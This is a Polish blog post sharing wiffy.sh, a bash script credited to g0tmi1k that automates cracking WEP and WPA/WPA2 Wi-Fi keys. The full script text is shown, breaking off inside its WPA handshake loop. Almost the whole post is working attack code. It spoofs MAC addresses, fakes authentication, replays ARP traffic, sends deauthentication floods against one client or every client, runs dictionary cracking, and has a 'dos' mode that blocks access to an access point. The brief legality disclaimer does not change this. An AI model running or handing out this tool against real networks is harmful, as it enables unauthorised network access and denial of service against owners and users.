Łamanie zabezpieczeń sieci – WEP,WPA/WPA2 [ Skrypt ]

Na początku chciałbym zaznaczyć że takie łamanie zabezpieczeń jest nielegalne, i czynisz tym zło.
Jednak dla sprawdzenia naszej sieci, pod względem „truności” złamania naszego hasła polecam ten skrypt! ]:->

Chciałbym pokazać wam skrypt pewnej osoby zwanej w internecie : g0tmi1k
Musze powiedzieć że  chłopak zna się na sieciach, i na bashu .. Za pomocą tego skryptu możemy złamać zabezpieczenie WEP swojej sieci w kilka sekund czy minut ( W zależności od złożoności hasła ).

What we need?
– Karte sieciową,
– Skrypt wiffy.sh
– Słownik w przypadku chęci złamania WPA/WPA2

How to use it?
– Uruchamiamy skrypt poprzez konsolę,  ( Wcześniej edytujemy skrypt dla naszego interfejsu, np. wlan0 )
– Czekamy.. gotowe.

Praktycznie i teoretycznie na tym koniec. Mogę się pochwalić że „mój” WEP udało się złamać i to bardzo sprawnie.

Skrypt:

#!/bin/bash
#----------------------------------------------------------------------------------------------#
#wiffy.sh v0.1 (#5 2010-09-13)                                 #
# (C)opyright 2010 - g0tmi1k                                  #
#---License------------------------------------------------------------------------------------#
# This program is free software: you can redistribute it and/or modify it under the terms   #
# of the GNU General Public License as published by the Free Software Foundation, either   #
# version 3 of the License, or (at your option) any later version.              #
#                                               #
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;  #
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  #
# See the GNU General Public License for more details.                    #
#                                               #
# You should have received a copy of the GNU General Public License along with this program. #
# If not, see .                         #
#---Important----------------------------------------------------------------------------------#
#           *** Do NOT use this for illegal or malicious use ***           #
#---Defaults-----------------------------------------------------------------------------------#
# The interfaces you use
interface="wlan0"

# [crack/dos] Crack - cracks WiFi Keys, dos - blocks access to ap.
mode="crack"

# 
 Change the MAC address
macMode="set"
fakeMac="00:05:7c:9a:58:3f"

# [/path/to/the/folder] The file used to brute force WPA keys.
wordlist="/pentest/passwords/wordlists/wpa.txt"

# [true/false] Connect to network afterwords
extras="false"

# [true/false] diagnostics = Creates a output file displays exactly whats going on. [0/1/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands
diagnostics="false"
verbose="0"

#---Variables----------------------------------------------------------------------------------#
     version="0.1 (#5)"  # Version
monitorInterface="mon0"    # Default
      bssid=""      # null the value
      essid=""      # null the value
     channel=""      # null the value
     client=""      # null the value
      debug="false"   # Windows don't close, shows extra stuff
     logFile="wiffy.log" # filename of output
trap 'cleanup interrupt' 2  # Captures interrupt signal (Ctrl + C)

#----Functions---------------------------------------------------------------------------------#
function findAP () { #findAP
  action "Scanning network" "rm -f /tmp/wiffy.tmp && iwlist $interface scan > /tmp/wiffy.tmp" $verbose $diagnostics "true"
  #arrayESSID=( $(cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}') )
  arrayBSSID=( $(cat /tmp/wiffy.tmp | grep "Address:" | awk '{print $5}\') )
  arrayChannel=( $(cat /tmp/wiffy.tmp | grep "Channel:" | tr ':' ' ' | awk '{print $2}\') )
  arrayProtected=( $(cat /tmp/wiffy.tmp | grep "key:" | sed 's/.*key://g') )
  arrayQuality=( $(cat /tmp/wiffy.tmp | grep "Quality" | sed 's/.*Quality=//g' | awk -F " " '{print $1}' ) )

  id=""
  index="0"
  for item in "${arrayBSSID[@]}"; do
   if [ "$bssid" ] && [ "$bssid" == "$item" ] ; then id="$index" ;fi
   command=$(cat /tmp/wiffy.tmp | sed -n "/$item/, +20p" | grep "WPA" )
   if [ "$command" ] ; then arrayEncryption[$index]="WPA"
   elif [ ${arrayProtected[$index]} == "off" ] ; then arrayEncryption[$index]="N/A"
   else arrayEncryption[$index]="WEP" ; fi
   index=$(($index+1))
  done

  #-Cheap hack to support essids with spaces in-----------------------------------------------------------
  cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}' | sed 's/\"//' | sed 's/\(.*\)\"/\1/' > /tmp/wiffy.ssid
  index="0"
  while read line ; do
   if [ "$essid" ] && [ "$essid" == "$line" ] ; then id="$index" ; fi
   arrayESSID[$index]="$line"
   index=$(($index+1))
  done < "/tmp/wiffy.ssid"
  rm -f /tmp/wiffy.ssid
  #--------------------------------------------------------------------------------------------------------------
}
function findClient () { #findClient $encryption
  if [ -z "$1" ] ; then error="1" ; fi # Coding error
  if [ "$error" == "free" ] ; then
   client=""
   action "Removing temp files" "rm -f /tmp/wiffy.dump* && sleep 1" $verbose $diagnostics "true"
   action "airodump-ng (client(s))" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy.dump --output-format netxml $monitorInterface" $verbose $diagnostics "true" &
   sleep 3

   if [ "$1" == "WEP" ] || [ "$1" == "N/A" ] ; then # N/A = For MAC filtering
     sleep 5
     client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
   elif [ "$1" == "WPA" ] ; then
     while [ -z "$client" ] ; do
      sleep 2
      client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
     done
   fi

   if [ -z "$essid" ] ; then
     essid=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/')
     if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*hidden* essid=$essid" $diagnostics ; fi
   fi

   command=$(ps aux | grep "airodump-ng" | awk '!/grep/ && !/awk/ && !/cap/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
   if [ -n "$command" ] ; then
     action "Killing programs" "kill $command" $verbose $diagnostics "true"
     sleep 1
   fi

   action "Removing temp files" "rm -f /tmp/wiffy.dump*" $verbose $diagnostics "true"
   if [ "$client" == "" ] ; then client="clientless" ; fi
   if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "client=$client" $diagnostics ; fi
   return 0
  else
   display error "findClient. Error code: $error" $diagnostics 1>&2
   return 1
  fi
}
function update() { # update
  if [ -e "/usr/bin/svn" ] ; then
   display action "Checking for an update..." $diagnostics
   update=$(svn info http://g0tmi1k.googlecode.com/svn/trunk/wiffy/ | grep "Last Changed Rev:" |cut -c11-)
   if [ "$version" != "0.3 (#$update)" ] ; then
     display info "Updating..." $diagnostics
     svn export -q --force http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh wiffy.sh
     display info "Updated to $update. (=" $diagnostics
   else
     display info "You're using the latest version. (=" $diagnostics
   fi
  else
   display info "Updating..." $diagnostics
   wget -nv -N http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh
   display info "Updated! (=" $diagnostics
  fi
  echo
  exit 2
}
function cleanup() { # cleanup mode
  if [ "$1" == "nonuser" ] ; then exit 3 ; fi

  action "Killing xterm" "killall xterm" $verbose $diagnostics "true"
  if [ "$1" != "clean" ] ; then
   echo # Blank line
   if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*** BREAK ***" $diagnostics ; fi # User quit
  fi
  display action "Restoring: Environment" $diagnostics

  command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  if [ "$command" == "$monitorInterface" ] ; then
   sleep 3 # Sometimes it needs to catch up/wait
   action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  fi

  if [ "$debug" != "true" ] ; then
   command=""
   tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
   if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
   tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
   if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
   tmp=$(ls replay_arp*.cap 2> /dev/null)
   if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
   if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
   if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
   if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
   if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
   if [ ! -z "$command" ] ; then action "Removing temp files" "rm -rfv $command" $verbose $diagnostics "true" ; fi
  fi

  echo -e "\e[01;36m[*]\e[00m Done! (= Have you... g0tmi1k?"
  exit 0
}
function help() {
  echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com

 Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack/dos] -e [essid] -b [bssid]
        -c [mac] -w [/path/to/file] (-z / -s [mac]) -x -d (-v / -V) ([-u] [-?])

 Options:
  -i --- Internet Interface e.g. $interface
  -t --- Monitor Interface e.g. $monitorInterface

  -m --- Mode. e.g. $mode

  -e --- ESSID (WiFi Name)
  -b --- BSSID (AP MAC Address)
  -c --- Client that is connect to the acess point

  -w --- Path to Wordlist e.g. $wordlist

  -z --- Change interface's MAC Address e.g. $macMode
  -s --- Use this MAC Address e.g. $fakeMac

  -x --- Connect to network afterwords

  -d --- Diagnostics   (Creates output file, $logFile)
  -v --- Verbose     (Displays more)
  -V --- (Higher) Verbose (Displays more + shows commands)

  -u --- Update
  -? --- This Known issues:
  -WEP
    > Didn't detect my client
     + Add it in manually
     + Re-run the script
    > IV's doesn't increae
     + DeAuth didn't work --- Client using Windows 7?
     + Use a different router/client

  -WPA
    > You can ONLY crack WPA when:
     + The ESSID is known
     + The WiFi key is in the word-list
     + There is a connected client

  -Doesn't detect any/my wireless network
    > Don't run from a virtual machine
    > Driver issue - Use a different WiFi device
    > Try the 're[f]resh' option
    > Unplug WiFi device, wait, replug
    > You're too close/far away

  -\"Extras\" doesn't work
    > Network doesn't have a DHCP server

  -Slow
    > Try a different attack... manually!
"
  exit 1
}
function action() { # action title command $verbose $diagnostics screen&file x|y|lines hold
  error="free"
  if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  if [ "$error" == "free" ] ; then
   xterm="xterm" #Defaults
   command=$2
   x="100"
   y="0"
   lines="15"
   if [ "$7" == "hold" ] ; then xterm="$xterm -hold" ; fi
   if [ "$3" == "2" ] ; then echo "Command: $command" ; fi
   if [ "$4" == "true" ] ; then echo "$1~$command" >> $logFile ; fi
   if [ "$4" == "true" ] && [ "$5" == "true" ] ; then command="$command | tee -a $logFile" ; fi
   if [ ! -z "$6" ] ; then
     x=$(echo $6 | cut -d'|' -f1)
     y=$(echo $6 | cut -d'|' -f2)
     lines=$(echo $6 | cut -d'|' -f3)
   fi
   $xterm -geometry 100x$lines+$x+$y -T "wiffy v$version - $1" -e "$command"
   return 0
  else
   display error "action. Error code: $error" $diagnostics 1>&2
   echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7" >> $logFile ;
   return 1
  fi
}
function display() { # display type message $diagnostics
  error="free"
  if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  if [ "$1" != "action" ] && [ "$1" != "info" ] && [ "$1" != "diag" ] && [ "$1" != "error" ] ; then error="5"; fi # Coding error
  if [ "$error" == "free" ] ; then
   output=""
   if [ "$1" == "action" ] ; then output="\e[01;32m[>]\e[00m" ; fi
   if [ "$1" == "info" ] ;  then output="\e[01;33m[i]\e[00m" ; fi
   if [ "$1" == "diag" ] ;  then output="\e[01;34m[+]\e[00m" ; fi
   if [ "$1" == "error" ] ; then output="\e[01;31m[-]\e[00m" ; fi
   output="$output $2"
   echo -e "$output"
   if [ "$3" == "true" ] ; then
     if [ "$1" == "action" ] ; then output="[>]" ; fi
     if [ "$1" == "info" ] ;  then output="[i]" ; fi
     if [ "$1" == "diag" ] ;  then output="[+]" ; fi
     if [ "$1" == "error" ] ; then output="[-]" ; fi
     echo -e "---------------------------------------------------------------------------------------------\n$output $2" >> $logFile
   fi
   return 0
  else
   display error "display. Error code: $error" $logFile 1>&2
   echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: display (Error code: $error): $1 , $2 , $3 " >> $logFile ;
   return 1
  fi
}


#----------------------------------------------------------------------------------------------#
echo -e "\e[01;36m[*]\e[00m wiffy v$version"

#----------------------------------------------------------------------------------------------#
while getopts "i:t:m:e:b:c:w:z:s:xdvVu?" OPTIONS; do
  case ${OPTIONS} in
   i ) interface=$OPTARG;;
   t ) monitorInterface=$OPTARG;;
   m ) mode=$OPTARG;;
   e ) essid=$OPTARG;;
   b ) bssid=$OPTARG;;
   c ) client=$OPTARG;;
   w ) wordlist=$OPTARG;;
   z ) macMode=$OPTARG;;
   s ) fakeMac=$OPTARG;;
   x ) extras="true";;
   d ) diagnostics="true";;
   v ) verbose="1";;
   V ) verbose="2";;
   u ) update;;
   ? ) help;;
   * ) display error "Unknown option." $diagnostics 1>&2 ;;  # Default
  esac
done

#----------------------------------------------------------------------------------------------#
if [ "$debug" == "true" ] ; then
  display info "Debug mode" $diagnostics
fi
if [ "$diagnostics" == "true" ] ; then
  display diag "Diagnostics mode" $diagnostics
  echo -e "wiffy v$version\n$(date)" > $logFile
  echo "wiffy.sh" $* >> $logFile
fi

#----------------------------------------------------------------------------------------------#
display action "Analyzing: Environment" $diagnostics

#----------------------------------------------------------------------------------------------#
if [ "$(id -u)" != "0" ] ; then display error "Not a superuser." $diagnostics 1>&2 ; cleanup nonuser; fi

#----------------------------------------------------------------------------------------------#
command=""
tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
tmp=$(ls replay_arp*.cap 2> /dev/null)
if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
if [ ! -z "$command" ] ; then action "Removing old files" "rm -rfv $command" $verbose $diagnostics "true" ; fi

#----------------------------------------------------------------------------------------------#
if [ -z "$interface" ] ; then display error "interface can't be blank" $diagnostics 1>&2 ; cleanup; fi
if [ -z "$monitorInterface" ] ; then display error "monitorInterface can't be blank" $diagnostics 1>&2 ; cleanup; fi
if [ "$mode" != "crack" ] && [ "$mode" != "dos" ] ; then display error "mode ($mode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ ! -e "$wordlist" ] ; then display error "There isn't a wordlist at $wordlist" $diagnostics 1>&2 ; cleanup; fi
if [ "$macMode" != "random" ] && [ "$macMode" != "set" ] && [ "$macMode" != "false" ] ; then display error "macMode ($macMode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ "$macMode" == "set" ] ; then if [ -z "$fakeMac" ] || [ ! $(echo $fakeMac | egrep "^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$") ] ; then display error "fakeMac ($fakeMac) isn't correct" $diagnostics 1>&2 ; cleanup; fi ; fi
if [ "$mode" == "crack" ] && [ "$extras" != "true" ] && [ "$extras" != "false" ] ; then display error "extras ($extras) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ "$diagnostics" != "true" ] && [ "$diagnostics" != "false" ] ; then display error "diagnostics ($diagnostics) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ "$verbose" != "0" ] && [ "$verbose" != "1" ] && [ "$verbose" != "2" ] ; then display error "verbose ($verbose) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ -z "$version" ] ; then display error "version ($version) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ "$debug" != "true" ] && [ "$debug" != "false" ] ; then display error "debug ($debug) isn't correct" $diagnostics 1>&2 ; cleanup; fi
if [ "$diagnostics" == "true" ] && [ -z "$logFile" ] ; then display error "logFile ($logFile) isn't correct" $diagnostics 1>&2 ; cleanup ; fi

#----------------------------------------------------------------------------------------------#
command=$(iwconfig $interface 2>/dev/null | grep "802.11" | cut -d" " -f1)
if [ ! $command ]; then
  display error "$interface isn't a wireless interface." $diagnostics
  display info "Searching for a wireless interface" $diagnostics
  command=$(iwconfig 2>/dev/null | grep "802.11" | cut -d" " -f1) #| awk '!/"'"$interface"'"/'
  if [ $command ] ; then
   interface=$command
   display info "Found $interface" $diagnostics
  else
   display error "Couldn't find a wireless interface." $diagnostics 1>&2
   cleanup
  fi
fi

command=$(ifconfig -a | grep $interface | awk '{print $1}')
if [ "$command" != "$interface" ] ; then
  display error "The wireless interface $interface, isn't correct." $diagnostics 1>&2
  if [ "$debug" == "true" ] ; then iwconfig; fi
  cleanup
fi

#----------------------------------------------------------------------------------------------#
mac=$(macchanger --show $interface | awk -F " " '{print $3}')

#----------------------------------------------------------------------------------------------#
if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Stopping: Programs" $diagnostics ; fi
command=$(ps aux | grep $interface | awk '!/grep/ && !/awk/ && !/wiffy/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
if [ -n "$command" ] ; then
  action "Killing programs" "kill $command" $verbose $diagnostics "true" # to prevent interference
fi
action "Killing 'Programs'" "killall wicd-client airodump-ng xterm" $verbose $diagnostics "true" # Killing "wicd-client" to prevent channel hopping
action "Killing 'wicd service'" "/etc/init.d/wicd stop" $verbose $diagnostics "true" # Stopping wicd to prevent channel hopping

#----------------------------------------------------------------------------------------------#
action "Refreshing interface" "ifconfig $interface down && ifconfig $interface up && sleep 1" $verbose $diagnostics "true"
loopMain="false"
while [ "$loopMain" != "true" ] ; do
  findAP
  if [ "$id" ] ; then
   loopMain="true"
  else
   if [ "$essid" ] ; then display error "Couldnt find essid ($essid)" $diagnostics 1>&2 ; fi
   if [ "$bssid" ] ; then display error "Couldnt find bssid ($bssid)" $diagnostics 1>&2 ; fi
   loop=${#arrayBSSID[@]}
   echo -e " Num |     ESSID     |    BSSID    | Protected | Cha | Quality\n-----|------------------------|-------------------|-----------|-----|---------"
   for (( i=0;i<$loop;i++)); do
     printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\n' "$(($i+1))" "${arrayESSID[${i}]}" "${arrayBSSID[${i}]}" "${arrayProtected[${i}]}" "${arrayEncryption[${i}]}" "${arrayChannel[${i}]}" "${arrayQuality[${i}]}"
   done
   loopSub="false"
   while [ "$loopSub" != "true" ] ; do
     read -p "[~] re[s]can, re[f]resh, e[x]it or select num: "
     if [ "$REPLY" == "x" ] ; then cleanup clean
     elif [ "$REPLY" == "s" ] ; then loopSub="true" # aka do nothing
     elif [ "$REPLY" == "f" ] ; then action "Refreshing interface" "ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1" $verbose $diagnostics "true" && loopSub="true" # aka do nothing
     elif [ -z $(echo "$REPLY" | tr -dc '[:digit:]'l) ] ; then display error "Bad input, $REPLY" $diagnostics 1>&2
     elif [ "$REPLY" -lt 1 ] || [ "$REPLY" -gt $loop ] ; then display error "Incorrect number, $REPLY" $diagnostics 1>&2
     else id="$(($REPLY-1))" ; loopSub="true" ; loopMain="true"
     fi
   done
  fi
done
essid="${arrayESSID[$id]}"
bssid="${arrayBSSID[$id]}"
channel="${arrayChannel[$id]}"
encryption="${arrayEncryption[$id]}"

#----------------------------------------------------------------------------------------------#
if [ "$diagnostics" == "true" ] ; then
  echo "-Settings------------------------------------------------------------------------------------
    interface=$interface
 monitorInterface=$monitorInterface
       mode=$mode
      essid=$essid
      bssid=$bssid
    encryption=$encryption
     channel=$channel
      client=$client
     wordlist=$wordlist
       mac=$mac
     macMode=$macMode
     fakeMac=$fakeMac
   diagnostics=$diagnostics
     verbose=$verbose
      debug=$debug
-Environment---------------------------------------------------------------------------------" >> $logFile
  display diag "Detecting: Kernal" $diagnostics
  uname -a >> $logFile
  display diag "Detecting: Hardware" $diagnostics
  lspci -knn >> $logFile
fi
if [ "$debug" == "true" ] || [ "$verbose" != "0" ] ; then
  display info "    interface=$interface
\e[01;33m[i]\e[00m monitorInterface=$monitorInterface
\e[01;33m[i]\e[00m       mode=$mode
\e[01;33m[i]\e[00m      essid=$essid
\e[01;33m[i]\e[00m      bssid=$bssid
\e[01;33m[i]\e[00m    encryption=$encryption
\e[01;33m[i]\e[00m     channel=$channel
\e[01;33m[i]\e[00m      client=$client
\e[01;33m[i]\e[00m     wordlist=$wordlist
\e[01;33m[i]\e[00m       mac=$mac
\e[01;33m[i]\e[00m     macMode=$macMode
\e[01;33m[i]\e[00m     fakeMac=$fakeMac
\e[01;33m[i]\e[00m   diagnostics=$diagnostics
\e[01;33m[i]\e[00m     verbose=$verbose
\e[01;33m[i]\e[00m      debug=$debug"
fi

#----------------------------------------------------------------------------------------------#
if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  display error "aircrack-ng isn't installed." $diagnostics 1>&2
  read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install aircrack-ng" "apt-get -y install aircrack-ng" $verbose $diagnostics "true" ; fi
  if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
   display error "Failed to install aircrack-ng" $diagnostics 1>&2 ; cleanup
  else
   display info "Installed aircrack-ng" $diagnostics
  fi
fi
if [ ! -e "/usr/bin/macchanger" ] ; then
  display error "macchanger isn't installed." $diagnostics
  read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install macchanger" "apt-get -y install macchanger" $verbose $diagnostics "true" ; fi
  if [ ! -e "/usr/bin/macchanger" ] ; then
   display error "Failed to install macchanger" $diagnostics 1>&2 ; cleanup
  else
   display info "Installed macchanger" $diagnostics
  fi
fi
#if [ "$attack" == "inject" ] ; then
#  if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
#   display error "airpwn isn't installed." $diagnostics
#   read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
#   if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install airpwn" "apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev" $verbose $diagnostics "true" ; fi
#   action "Install airpwn" "wget -P /tmp http://downloads.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz && tar -C /pentest/wireless -xvf /tmp/airpwn-1.4.tgz && rm /tmp/airpwn-1.4.tgz" $verbose $diagnostics "true"
#   find="#include \n#ifndef _LINUX_WIRELESS_H"
#   replace="#ifndef _LINUX_WIRELESS_H"
#   sed "s/$find/$replace/g" "/usr/include/linux/wireless.h" > "/usr/include/linux/wireless.h.new"
#   find="#ifndef _LINUX_WIRELESS_H"
#   replace="#include \n#ifndef _LINUX_WIRELESS_H"
#   sed "s/$find/$replace/g" "/usr/include/linux/wireless.h.new" > "/usr/include/linux/wireless.h"
#   rm -f "/usr/include/linux/wireless.h.new"
#   action "Install airpwn" "command=$(pwd) && tar -C /pentest/wireless/airpwn-1.4 -xvf /pentest/wireless/airpwn-1.4/lorcon-current.tgz && cd /pentest/wireless/airpwn-1.4/lorcon && ./configure && make && make install && cd $command" $verbose $diagnostics "true"
#   action "Install airpwn" "command=$(pwd) && cd /pentest/wireless/airpwn-1.4 && ./configure && make && cd $command" $verbose $diagnostics "true"
#   if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
#     display error "Failed to install airpwn" $diagnostics 1>&2 ; cleanup
#   else
#     display info "Installed airpwn" $diagnostics
#   fi
#  fi
#fi

#----------------------------------------------------------------------------------------------#
display action "Configuring: Environment" $diagnostics

#----------------------------------------------------------------------------------------------#
if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: Wireless card" $diagnostics ; fi
command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
if [ "$command" == "$monitorInterface" ] ; then
  action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  sleep 1
fi

action "Monitor Mode (Starting)" "airmon-ng start $interface | awk '/monitor mode enabled on/ {print \$5}' | tr -d '\011' | sed -e \"s/(monitor mode enabled on //\" | sed 's/\(.*\)./\1/' > /tmp/wiffy.tmp" $verbose $diagnostics "true"
command=$(cat /tmp/wiffy.tmp)
if [ "$monitorInterface" != "$command" ] ; then
  if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
   display info "Configuring: Chaning monitorInterface to: $command" $diagnostics
  fi
  monitorInterface=$command
fi

command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
if [ "$command" != "$monitorInterface" ] ; then
  sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!
  command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  if [ "$command" != "$monitorInterface" ] ; then
   display error "The monitor interface $monitorInterface, isn't correct." $diagnostics 1>&2
  if [ "$debug" == "true" ] ; then iwconfig; fi
  cleanup
  fi
fi

#----------------------------------------------------------------------------------------------#
if [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  display diag "Testing: Wireless Injection" $diagnostics
  command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)
  if [ "$diagnostics" == "true" ] ; then echo -e $command >> $logFile ; fi
  if [ -z "$(echo \"$command\" | grep 'Injection is working')" ] ; then display error "$monitorInterface doesn't support packet injecting." $diagnostics 1>&2
  elif [ -z "$(echo \"$command\" | grep 'Found 0 APs')" ] ; then display error "Couldn't test packet injection" $diagnostics 1>&2 ;
  fi
fi

#----------------------------------------------------------------------------------------------#
if [ "$macMode" != "false" ] ; then
  if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: MAC address" $diagnostics ; fi
  command="ifconfig $monitorInterface down &&"
  if [ "$macMode" == "random" ] ; then command="$command macchanger -A $monitorInterface &&"; fi
  if [ "$macMode" == "set" ] ; then command="$command macchanger -m $fakeMac $monitorInterface &&"; fi
  command="$command ifconfig $monitorInterface up"
  action "Configuring: MAC address" "$command" $verbose $diagnostics "true"
  sleep 2
  mac="$fakeMac"
fi

#----------------------------------------------------------------------------------------------#
if [ "$mode" == "crack" ] ; then
  if [ -z "$client" ] ; then
   display action "Detecting: Client(s)" $diagnostics
   findClient $encryption
  fi

  #----------------------------------------------------------------------------------------------#
  display action "Starting: airodump-ng" $diagnostics
  action "Removing temp files" "rm -f /tmp/wiffy* && sleep 1" $verbose $diagnostics "true"
  action "airodump-ng" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy --output-format cap $monitorInterface" $verbose $diagnostics "true" "0|0|13" & # Don't wait, do the next command
  sleep 1

  #----------------------------------------------------------------------------------------------#
  if [ "$encryption" == "WEP" ] ; then
   if [ "$client" == "clientless" ] ; then
     display action "Attack (FakeAuth): $fakeMac" $diagnostics
     action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $mac $monitorInterface" $verbose $diagnostics "true"
     #action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 30 -o 1 -q 10 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true"
     #if [Association successful] = then
     client=$mac
     sleep 1
   fi
   display action "Attack (ARPReplay+Deauth): $client" $diagnostics
   action "aireplay-ng (arpreplay)" "aireplay-ng --arpreplay -e \"$essid\" -b $bssid -h $client $monitorInterface" $verbose $diagnostics "true" "0|195|10" & # Don't wait, do the next command
   sleep 1
   action "aireplay-ng (deauth)" "aireplay-ng --deauth 5 -e \"$essid\" -a $bssid -c $fakeMac $monitorInterface" $verbose $diagnostics "true"
   sleep 1
   if [ "$client" == "$mac" ] ; then sleep 20 && action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true" ; fi
   sleep 60

  #----------------------------------------------------------------------------------------------#
  elif [ "$encryption" == "WPA" ] ; then
   display action "Capturing: Handshake" $diagnostics
   loop="0" # 0 = first, 1 = client, 2 = everyone
   echo "g0tmi1k" > /tmp/wiffy.tmp
   for (( ; ; )) ; do
     action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w /tmp/wiffy.tmp -e \"$essid\" > /tmp/wiffy.handshake" $verbose $diagnostics "true"
     command=$(cat /tmp/wiffy.handshake | grep "Passphrase not in dictionary" ) #Got no data packets from client network & No valid WPA handshakes found
     if [ "$command" ] ; then break; fi
     sleep 2
     if [ "$loop" != "1" ] ; then
      if [ "$loop" != "0" ] ; then findClient $encryption ; fi
      sleep 1
      if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): $client" $diagnostics ; fi
      action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid -c $client mon0" $verbose $diagnostics "true"
      loop="1"
     else
      if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): *everyone*" $diagnostics ; fi
      action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid mon0" $verbose $diagnostics "true"
      loop="2"
     fi
     sleep 1
   done
